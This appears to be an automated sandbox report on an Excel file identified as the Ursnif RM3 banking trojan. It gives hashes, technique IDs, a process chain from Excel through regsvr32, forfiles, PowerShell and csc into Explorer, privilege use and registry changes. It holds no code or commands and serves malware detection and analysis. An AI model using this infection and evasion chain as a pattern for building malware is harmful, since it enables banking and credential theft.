ursnif_rm3 | ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

Analysis

max time kernel
149s
max time network
152s
platform
windows7_x64
resource
win7v20201028
submitted
13-11-2020 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Information.xlsb
Size

20KB
MD5

4dddb0320eac6050d6360c92c104d05c
SHA1

816db7af62de3dc200b88357a5341c6ce184cc93
SHA256

ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f
SHA512

b177b5faa839aeead6c9c732b0182b928903dd34e02d968b95cd93b2f3f01c3b72043c9dafcb6a96a9d1eeb67e4e12abaf537f7ac32b3d166d7f82914844881d

Score

10^/10

ursnif_rm3 banker trojan

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

regsvr32.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1496	1900	regsvr32.exe	EXCEL.EXE

Ursnif RM3
A heavily modified version of Ursnif discovered in the wild.
banker trojan ursnif_rm3
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1496 regsvr32.exe

pid	process
1496	regsvr32.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2880 timeout.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

pid	process
2880	timeout.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 115 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEEXCEL.EXEiexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000003a89aeebd6eac0e28ea5371ea4b3f212f8a0451a2ef00fd5fbec9ca7196f3fa8000000000e8000000002000020000000008f8fcc26faa105faaeb74ec4803762a64f4c26343dfd0d87084e4df2b6241e30010000fb0c79c272bec031c4ee81f097a6f3f4ac89e1af2656c6b62148494cd75815011cc1c3ebe1d652c01abbed02ee5e09ac9ce525195f448ee251f586dee007fdcbcfc4a589f224b4e116f475e25c60ef78e06015c99778a4b44bb98e83170185681bbc9fc50c91e3b569ffd3f95b126a67aa06ab3b44d9ecdf79ee3d570128cc0bba4606d5c9d6188782abc478067e8d1a66167063c711929cc78d9e47babbc0d0c14fef5a838471c87a0206abc2d2fa35c860ac08bf502ddf70f3ac7076c849ec4886269e5f26a2d8c3b1f717ea6c33b8c83bdf55a79e782c99e0c36d3773abb0a54d8bf2676ea3140db1339e3a89ddcbc20943ea29dc19293bbec5ca67757b629db5b3365c9b46aef33fa832bdfe598ff195ed8a311ff08d31525d3803e56bfae444490bbbc93de44dc6c491318bdb4c40000000203bb246df28b2978246b5b88b69566ae727d634089f001889647eec0a9202d9704ba8dc83cc0a2dd3839f8c9f0ff9fd3a88723eb5d06500a4259049af2ef4cd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000f55f83e612257ec7d3ce43e4d8f041d1f9b399d0ccf249e6321dc063a68dddbf000000000e80000000020000200000009f2008a70b16b3c6554d53586065829fab2231f9eab0b22b6625bd32f820d0f43001000029c0874bf2a6c151d6d02c77118fef665879bbfcfb0ab7af82d9dc801f50fc2b2ba6acbc92a7f81dcf9ca7a4932bd085f0a6d9a9a44995aaeb33afed86e1d106e4cad732cdf3c17ae345a3a97c8418c0c82e25c7d17a01b48b3eb74da26ba04b05cb23b7092bd5129a79f0c7de235a8e9a8c2baaaf3ba15fdefff7b83635a8884fae6bf2696cbba188922978c3e9b9ca343ac94c61e135febfcb011706d14a68792a4e2d630ea66320614d8eb77495ff84c3f151e4e38e44362519a092a8f751ed611beba8e6533f8b3295096762fad74042e1b18f8dececb2fc5ad2e1967b40036972912a888fddd5bd6f8d0901d5de9ecf87440fc43feaee6169170feaa6642b2c08cdbe4efea18a084aacac4fd6476c159adbfaf89aec4c1f25cfc7e09fbeab787170064374797f4f75653b2a00ae40000000802eb92dc02a2078f9e95606aaa259899989daadb62d961ce291b80503792538ebd07ded9de955b2c80fc506f93c7a38c63f5726cc22cceced6a265977133fc6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000422a56513b720de44178d6cbd5c25d4b71efc11aa0508a7e92ebcd92e5e302d1000000000e8000000002000020000000b4442980b7b9cbc48a7fd84263db20cf803af308241d4a5fc9be8a828b7cfc943001000038616e6a31be91c6c4bfc4fb85cf8d5effc8d307c906313f8388f325edcb1a15a76a3a880c2c13f380732671346cf95a286e424219cc55732e3e97b0a57bb7c8c5f4cad7ee928a8560dc7afde934f732ca4c3de755aa1bf9dd2b4d5d5f69972ea64067e708dcd64b26350f283e4c4c036ff704730609f7c09ca2c72a499e7f8e0d33e82bb5d20fd43d4556bcab1bdfae99ef277eb6bdc3e4521262277e8b7e96dbae46c99e2c49a79e61987e8e2eb9c7824c1653b5efbd8ea771c3fbc6ad4d30d28288cfcc199a38b8803536a2ed2017307fb5ee06b5491b2cdc6e56c40b018aea0c683e063fa76e366e6a60b6a887b00bb6628b4f43e756dd6973c0049037e04a9678738d2b40748a86f4e025a12c053f0f68b2df8bb6f91177a4d33330bf6ccb996d860fd0987d46a06498867f4945400000008e37ee50ee12edd131f75143a3487f9c4cb22412a11a3f0e36b6bc70f073658d3706dbb9defad8fb0c30d3e96f3a122cdc133f3a81b3262aa23ca549e6371c61	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000009aae01c5e1f91d3f1d89fa7a6c6c1a642228b829e07d0495870afb578491a7ed000000000e8000000002000020000000b9f35ae120e1616e2743805f9856486a98db501513583f36ed921eeb4d7eb8fc30010000648863f5bb70ce55279c505b5485230bae48558508c66b555e16f324e2ffd0317191ca65da8fa964e52ce8c22c00511b338e92e5fca7e8fb71e84b51b357b4885dd493fbbb16adb6efb1971b8b6f5320272ec127b421ea0d07685adc2d9654143f18412b6f1aebe579e86e47dc0dae1c741dcc619b253e6a42c07b9e90778bc35c9f791fe135b4c80ce2d3c8e0ee43c666288e5bf4f7dc840d7e821a72dd121a011cb2f0d4f0dbb623282e90b5ca2c06e695282ea5c04e521033f1ae9639df996837e7b34313653279458cb8b74d457c1bb9d431385b0e9142c0cbb7286a0a3b9dcf80fcd9a8047e6a5012433b3ff7f3397d8ae88b1cfae860b9439b7a232db46322daf00fbf97d8ba752f13cab8476be37e9d749d5ad01c6d2ab4484ad60492faa4636627e2644a16bb949e0c578af540000000b12cbe20aabe64f52993c16ceca0012dcd44e67dbec178337905056340afe713587dc75e0a892f4018b827325c3badb2777d1e240248fc95cbf9d9373379b7fb	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000004403874a2ae7fb6b53cfa86d61f352e9d01a6c403ccdb7ce743dc1a1873eaf57000000000e80000000020000200000001f0d0f380ad19a4af5e4d901ea71bcb385e70259da5968e100190dd5ecacbc1630010000cdd9e783403774eba01b138c59f34e4c7c3962017f7c239fabb300cc292d6ae3e7c09c8832a48ff8de6ab989dd60bbc3c2935e60b02be6145874f80a5eeba8b0824ed186d75d025dcb1add76549b9fffb9355ca2326de69e6b9087bf90e91f7d5d959ea5e07117df353a4801d1082d5571d2f78ce0282596d8d2c7b2cf9ae3fe8b79fd7ab64d8bf0bbb118b15ea439d0448a62924d161d153f3b080939286e89f216f2acb81c391a1ac2a16d9973a3c109ff1c90720a515fdd57cc68db9bdf0b65890ff9c7c230a6d5c157bb760ef8d5e7716485436b1a3f77dc622c6aa3211dcb8138de07788b08901a91150d99fabe460e8b0ccc205b0bf95f84a382fd4365fb22fbaa78bf3ba6615eefd317d59ac14d030b59a701f0bf4ceaa348f15acb969a931332b0d6d4561448d4f27a612f4740000000ae451520d6cf8616e75433f630a6e0d15eb117f8eac1a448609c949af40519bdb0194d9d24d95e685fe1c4c8ba0a9c2a1e89cbd41ab4d7e1972b339256f3b77c	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000104b2195c174c872d1773be6c9ccb1409d8770a2920407dc4f1e8f5e269d94bc000000000e80000000020000200000005db4c5403891c3492e9241c2fb0ee96ef31366c32d8e44d4606adc52018e70ae300100006556ed22a4c58d9eb8210824c8ee98b65cc5f1900e55fd2a0d3c2217a54b271e3c1c571ea58c403fe9b2827a238fe5894a2329d5a7774fbd6a6315f71f02a28e027c37768c34bb09df241bc3a3eef6d0143f3751a18550f998d33ba02a5d8923a12d514cf070718431d254130d91d95a0711fe56cf25500ce1c32ecfa04549f5006ee17ff6b0719f04851a2e0c8c21d93848a9c334de90b2f94a5955fb71cf71b164022521b2588242696f99bbdf62caba54d98455fd9f69b0ecbcb41654815e6eae112e06fab383309d10c32775e8c63fc6f3bc6752eb117ffca82167d7e1a4452435c84b0c720d1fd02cbec5608b02f4fe63c5ddbabc5d725973b5d4b674da6ff0a90b44130a17f6aef97c3a80ff7921c25d4701a1b8c9baa87886d8177b0f50420a5bea02a7112d2922f730a571c840000000cd5f30fe501e964fb31af3ca5cb0f3d57df9e9f54209edfbc79bc757090b8b5de238a39dd130e6b7290791526f926f8324f6239bd14e702bf09bcdb52660d8b7	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff6400000019000000ea0400007e020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000b07acb0da9ff334aba208dcf0f2776095914e4d51a1586d81d40fd75a0227c88000000000e8000000002000020000000eea5e9f0a22b145f6bca08c281b770be2eb674e1f180beeb65705535131d30a130010000822dc82a8eb64911888c589008ce055dac03b4bcd4a2f7914d301a559900b02df45e3e1a61b7a19c5b2c3ba10617be06323bee2f9e172924dca6eb7b30f89e7062871662f6fa29d433a989f117299bab93a5b09fcbba35e9feac158b00a6b57f1fe69d684ef80afd5be963a99d3b653fa4105e58a646d8be70cf417187aa2cb6ba86774ee3ddfb76f2d0b639fc81813651b7c7d5a3a0bdd6bb46534f9ca54e4b9c83e6df07ab35ea9549cd85e009523b6161f38e89eb1fc91ee4ee4488aadfecccc14447af596e752f41cf7e356c8eb30ab64a06b2f8f37b5bc8ac72c9e5d81f5d9a1696813acd264001e6e2c2f87817fc919a7996dcacdfdcb3c0980db282bfa1688c477f1b0739e217aca0a877db241d93150daa38578b55de0db15174e8691a65839f16509c51adbf6b0555f7fa974000000093318312c4d500a6d76f8add4bf0a53955956a0103f690ebdb07fe85f4da08d07130742fc2b07487e9a77af7f9db15c83965d7e37836ccf16fa6614f171c682b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000006da5f2012aca3c3a0eb0616c0625c1daf215a9b10903cc50ddef7f763d287c90000000000e800000000200002000000057317a5157d77bfa07411d9ec3a76064b60fcadbee3abdb95327091548f5396b300100004a5d473fa1652b010e5e040a0a45933df01b84d45352bde7aea2d1e2139fc6b72dcb39a87478a19732b10101a825945a11f209bbfb90bf29b7e010e7f4884801dfef1b015e1075b74a841654a486a8bb5359c460be91582b54695ec8a735d5489ab1c68d384c7f830bdf86ffebf90a7c27e7b5508b57e9003e42f2af537ba1df2fde8e4b91b369e9292b1ec6a6a5c1f1155c73329c7b9101f2905aa7375f34f3440e89abbd38487e6f098862632bd4765f2255782915453f53b465d6274246618676eb18b2255400a70b2b565bc8d653b1fde32bf8954ffcc8113212db26a7f5cb3556a9a92fc4a1c02e6bef221a7c3d3194946363b25327d92d35a4a7b953b87643249ca21e9c5252c26944a79f52bf2b78488594f39f2ea983af9ba0eacad318950033337b18c0e9248548d0e296564000000030993af09ad727cef22e6fb835a59bcb7ceb37139518fe8dc1a6e663239bbe25679d4d43f02a6fa0c8380c8974903d2d45d81f11e18ecf8f926c8e220afcbfa6	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1900 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1072 powershell.exe
1072 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1072 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1072 powershell.exe

pid	process
1072	powershell.exe
1072	powershell.exe

pid	process
1072	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1072	powershell.exe

Suspicious use of FindShellTrayWindow 13 IoCs

Processes:

iexplore.exeiexplore.exeiexplore.exe

pid	process
1096	iexplore.exe
2248	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe
2464	iexplore.exe

Suspicious use of SetWindowsHookEx 57 IoCs

Processes:

EXCEL.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
1900	EXCEL.EXE
1900	EXCEL.EXE
1900	EXCEL.EXE
1096	iexplore.exe
1096	iexplore.exe
1580	IEXPLORE.EXE
1580	IEXPLORE.EXE
2248	iexplore.exe
2248	iexplore.exe
2300	IEXPLORE.EXE
2300	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2640	IEXPLORE.EXE
2640	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
1900	EXCEL.EXE
1900	EXCEL.EXE
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE
2464	iexplore.exe
2464	iexplore.exe
2512	IEXPLORE.EXE
2512	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

EXCEL.EXEiexplore.exeiexplore.exeiexplore.execmd.exeforfiles.execmd.exepowershell.execsc.execsc.execmd.exe

description	pid	process	target process
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1900 wrote to memory of 1496	1900	EXCEL.EXE	regsvr32.exe
PID 1096 wrote to memory of 1580	1096	iexplore.exe	IEXPLORE.EXE
PID 1096 wrote to memory of 1580	1096	iexplore.exe	IEXPLORE.EXE
PID 1096 wrote to memory of 1580	1096	iexplore.exe	IEXPLORE.EXE
PID 1096 wrote to memory of 1580	1096	iexplore.exe	IEXPLORE.EXE
PID 2248 wrote to memory of 2300	2248	iexplore.exe	IEXPLORE.EXE
PID 2248 wrote to memory of 2300	2248	iexplore.exe	IEXPLORE.EXE
PID 2248 wrote to memory of 2300	2248	iexplore.exe	IEXPLORE.EXE
PID 2248 wrote to memory of 2300	2248	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2512	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2512	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2512	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2512	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2640	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2640	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2640	2464	iexplore.exe	IEXPLORE.EXE
PID 2464 wrote to memory of 2640	2464	iexplore.exe	IEXPLORE.EXE
PID 1468 wrote to memory of 1944	1468	cmd.exe	forfiles.exe
PID 1468 wrote to memory of 1944	1468	cmd.exe	forfiles.exe
PID 1468 wrote to memory of 1944	1468	cmd.exe	forfiles.exe
PID 1944 wrote to memory of 1156	1944	forfiles.exe	cmd.exe
PID 1944 wrote to memory of 1156	1944	forfiles.exe	cmd.exe
PID 1944 wrote to memory of 1156	1944	forfiles.exe	cmd.exe
PID 1156 wrote to memory of 1072	1156	cmd.exe	powershell.exe
PID 1156 wrote to memory of 1072	1156	cmd.exe	powershell.exe
PID 1156 wrote to memory of 1072	1156	cmd.exe	powershell.exe
PID 1072 wrote to memory of 2624	1072	powershell.exe	csc.exe
PID 1072 wrote to memory of 2624	1072	powershell.exe	csc.exe
PID 1072 wrote to memory of 2624	1072	powershell.exe	csc.exe
PID 2624 wrote to memory of 2620	2624	csc.exe	cvtres.exe
PID 2624 wrote to memory of 2620	2624	csc.exe	cvtres.exe
PID 2624 wrote to memory of 2620	2624	csc.exe	cvtres.exe
PID 1072 wrote to memory of 1744	1072	powershell.exe	csc.exe
PID 1072 wrote to memory of 1744	1072	powershell.exe	csc.exe
PID 1072 wrote to memory of 1744	1072	powershell.exe	csc.exe
PID 1744 wrote to memory of 2780	1744	csc.exe	cvtres.exe
PID 1744 wrote to memory of 2780	1744	csc.exe	cvtres.exe
PID 1744 wrote to memory of 2780	1744	csc.exe	cvtres.exe
PID 1072 wrote to memory of 1260	1072	powershell.exe	Explorer.EXE
PID 2856 wrote to memory of 2880	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2880	2856	cmd.exe	timeout.exe
PID 2856 wrote to memory of 2880	2856	cmd.exe	timeout.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1260

